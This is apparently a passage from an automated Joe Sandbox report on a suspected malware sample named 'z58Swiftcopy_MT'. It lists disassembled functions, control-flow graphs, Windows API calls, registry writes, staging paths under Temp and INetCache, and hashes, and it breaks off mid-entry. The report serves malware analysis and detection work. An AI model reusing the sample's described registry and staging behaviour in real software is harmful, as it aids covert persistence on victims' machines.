                                                                                                                                                                                                                                      control_flow_graph 529 100016bd-100016f9 call 10001a5d 533 1000180a-1000180c 529->533 534 100016ff-10001703 529->534 535 10001705-1000170b call 100021b0 534->535 536 1000170c-10001719 call 100021fa 534->536 535->536 541 10001749-10001750 536->541 542 1000171b-10001720 536->542 543 10001770-10001774 541->543 544 10001752-1000176e call 100023d8 call 10001559 call 10001266 GlobalFree 541->544 545 10001722-10001723 542->545 546 1000173b-1000173e 542->546 550 100017b2-100017b8 call 100023d8 543->550 551 10001776-100017b0 call 10001559 call 100023d8 543->551 566 100017b9-100017bd 544->566 548 10001725-10001726 545->548 549 1000172b-1000172c call 100027e4 545->549 546->541 552 10001740-10001741 call 10002a9f 546->552 554 10001733-10001739 call 10002587 548->554 555 10001728-10001729 548->555 561 10001731 549->561 550->566 551->566 564 10001746 552->564 570 10001748 554->570 555->541 555->549 561->564 564->570 571 100017fa-10001801 566->571 572 100017bf-100017cd call 1000239e 566->572 570->541 571->533 577 10001803-10001804 GlobalFree 571->577 579 100017e5-100017ec 572->579 580 100017cf-100017d2 572->580 577->533 579->571 582 100017ee-100017f9 call 100014e2 579->582 580->579 581 100017d4-100017dc 580->581 581->579 583 100017de-100017df FreeLibrary 581->583 582->571 583->579
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                                                                                        • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                                                                        • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                                                                                                                                                        • Part of subcall function 10002587: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025F9
                                                                                                                                                                                                                                        • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1791698881-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 87444a894296e8d40cc63a4c2e1c416a7af340e3bff12e61cd27f34ad68e5005
                                                                                                                                                                                                                                      • Instruction ID: 474564f2ddd1a30fda7ef2e88bb39d7445f8f4f5c00c78564696995dcbc9c57a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87444a894296e8d40cc63a4c2e1c416a7af340e3bff12e61cd27f34ad68e5005
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4319E79408205DAFB41DF649CC5BCA37ECFB042D5F118465FA0A9A09EDF78A8858B60
                                                                                                                                                                                                                                      Function 004023D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 586 4023d0-402401 call 402ac1 * 2 call 402b51 593 402951-402960 586->593 594 402407-402411 586->594 596 402421-402424 594->596 597 402413-402420 call 402ac1 lstrlenA 594->597 600 402426-402437 call 402a9f 596->600 601 402438-40243b 596->601 597->596 600->601 603 40244c-402460 RegSetValueExA 601->603 604 40243d-402447 call 40303e 601->604 608 402462 603->608 609 402465-402542 RegCloseKey 603->609 604->603 608->609 609->593 611 402716-40271d 609->611 611->593
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb9327.tmp,00000023,00000011,00000002), ref: 0040241B
                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb9327.tmp,00000000,00000011,00000002), ref: 00402458
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb9327.tmp,00000000,00000011,00000002), ref: 0040253C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsb9327.tmp
                                                                                                                                                                                                                                      • API String ID: 2655323295-1374660692
                                                                                                                                                                                                                                      • Opcode ID: 97315e2270c4fa8c14221e85b70d1482120828f961fc2ed06137c593c8c56db8
                                                                                                                                                                                                                                      • Instruction ID: f5012b3eed6b0e10d725da1925ea8f3c2a7a7eca851d842cc00ee1163223ef4a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97315e2270c4fa8c14221e85b70d1482120828f961fc2ed06137c593c8c56db8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA115471E00215BEDF10EFA5DE89A9E7A74EB44754F21403BF508F71D1CAB84D419B29
                                                                                                                                                                                                                                      Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 695 4015bb-4015ce call 402ac1 call 405aca 700 4015d0-4015e3 call 405a5c 695->700 701 401624-401627 695->701 709 4015e5-4015e8 700->709 710 4015fb-4015fc call 405703 700->710 703 401652-40223c call 401423 701->703 704 401629-401644 call 401423 call 406099 SetCurrentDirectoryA 701->704 717 402951-402960 703->717 718 402716-40271d 703->718 704->717 721 40164a-40164d 704->721 709->710 714 4015ea-4015f1 call 405720 709->714 716 401601-401603 710->716 714->710 726 4015f3-4015f4 call 405686 714->726 723 401605-40160a 716->723 724 40161a-401622 716->724 718->717 721->717 728 401617 723->728 729 40160c-401615 GetFileAttributesA 723->729 724->700 724->701 731 4015f9 726->731 728->724 729->724 729->728 731->716
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\,?,00405B36,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0,00000000), ref: 00405AD8
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                                                                                                                        • Part of subcall function 00405686: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C9
                                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne, xrefs: 00401631
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne
                                                                                                                                                                                                                                      • API String ID: 1892508949-2316051892
                                                                                                                                                                                                                                      • Opcode ID: 5a0db44a106b04124225d00c71c703c66e8f93513efeef57bf12847e36071b41
                                                                                                                                                                                                                                      • Instruction ID: e80d591928eb94818456189605928617e464058bd7b4ab9a9bc67e70efbf424e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a0db44a106b04124225d00c71c703c66e8f93513efeef57bf12847e36071b41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3112731208151EBCF217BB54D415BF26B0DA92324B28093FE9D1B22E2D63D4D436A3F
                                                                                                                                                                                                                                      Function 00405B1F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 732 405b1f-405b3a call 406099 call 405aca 737 405b40-405b4d call 406303 732->737 738 405b3c-405b3e 732->738 742 405b59-405b5b 737->742 743 405b4f-405b53 737->743 739 405b92-405b94 738->739 745 405b71-405b7a lstrlenA 742->745 743->738 744 405b55-405b57 743->744 744->738 744->742 746 405b7c-405b90 call 405a31 GetFileAttributesA 745->746 747 405b5d-405b64 call 40639c 745->747 746->739 752 405b66-405b69 747->752 753 405b6b-405b6c call 405a78 747->753 752->738 752->753 753->745
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(?,?,C:\,?,00405B36,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0,00000000), ref: 00405AD8
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                                                                                                                                                                                                                        • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0,00000000), ref: 00405B72
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0), ref: 00405B82
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                      • String ID: C:\
                                                                                                                                                                                                                                      • API String ID: 3248276644-3404278061
                                                                                                                                                                                                                                      • Opcode ID: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                                                                                                                                                                                                                                      • Instruction ID: f7918bca05de5a67ada1f7886cb37670742315f8bcd1f0c25b92126024abb592
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DF0F425205E6516C722323A0C45AAF6964CE92324709423BF891B22C3CA3CB8429DBD
                                                                                                                                                                                                                                      Function 00406B5A Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
                                                                                                                                                                                                                                      • Instruction ID: 6855221002494b765214394805571b816b3a2b1c2e31bdc36608bad3b484bcdf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEA13271E00229CBDF28CFA8C8446ADBBB1FF44305F15856EE816BB281C7795A96DF44
                                                                                                                                                                                                                                      Function 00406D5B Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
                                                                                                                                                                                                                                      • Instruction ID: 6c4a77322bd37e7d8c46b95768b691bf5348243e95b36c4706824fec2f4d082d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0911170D00229CBDF28CF98C8587ADBBB1FF44305F15856AE816BB281C7795A96DF84
                                                                                                                                                                                                                                      Function 00406A71 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ec7db08be09974c8046cad88b73edbb403e33193446cf3f9fa5a5555e34d97c1
                                                                                                                                                                                                                                      • Instruction ID: 723f18ff0051ee6ad4f375e9cb18d989a687bb59657bcd06a5bbc8819a965d11
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec7db08be09974c8046cad88b73edbb403e33193446cf3f9fa5a5555e34d97c1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5814371E00229CFDF24CFA8C8847ADBBB1FB44305F25856AD416BB281C7389A96DF44
                                                                                                                                                                                                                                      Function 00406576 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8c6c0676c47b070245886c612b6dc18845a4ce32cc894a17ea31aa6889f3f80a
                                                                                                                                                                                                                                      • Instruction ID: f9a0fdfb68df0875c036107095c0f8e37124572de3281b7b6a4fcb1f7c3ff658
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c6c0676c47b070245886c612b6dc18845a4ce32cc894a17ea31aa6889f3f80a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF818771D00229DBDF24CFA8D8447AEBBB0FF44305F11856AE856BB280CB785A96DF44
                                                                                                                                                                                                                                      Function 004069C4 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f6ce5af891e87e3449ce1a2b8efcbaa2a3983e7e126d00aa5b1ca20c5284b7a8
                                                                                                                                                                                                                                      • Instruction ID: 20aa67b2f9945943e29b5428d9247f38e2249d0fc5fe98f3e4ff2a84f3334865
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6ce5af891e87e3449ce1a2b8efcbaa2a3983e7e126d00aa5b1ca20c5284b7a8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17712271E00229DBDF24CFA8C8447ADBBB1FF44305F15846AE856BB280C7395996DF54
                                                                                                                                                                                                                                      Function 00406AE2 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8cda32c1d2df7732f9a33e0b4945691d5d8bf2b32cd6aa3e273add15dd404c12
                                                                                                                                                                                                                                      • Instruction ID: 361238ff60de6b05a878e60f6b30513898442098bea6392746699c597b8ff52c
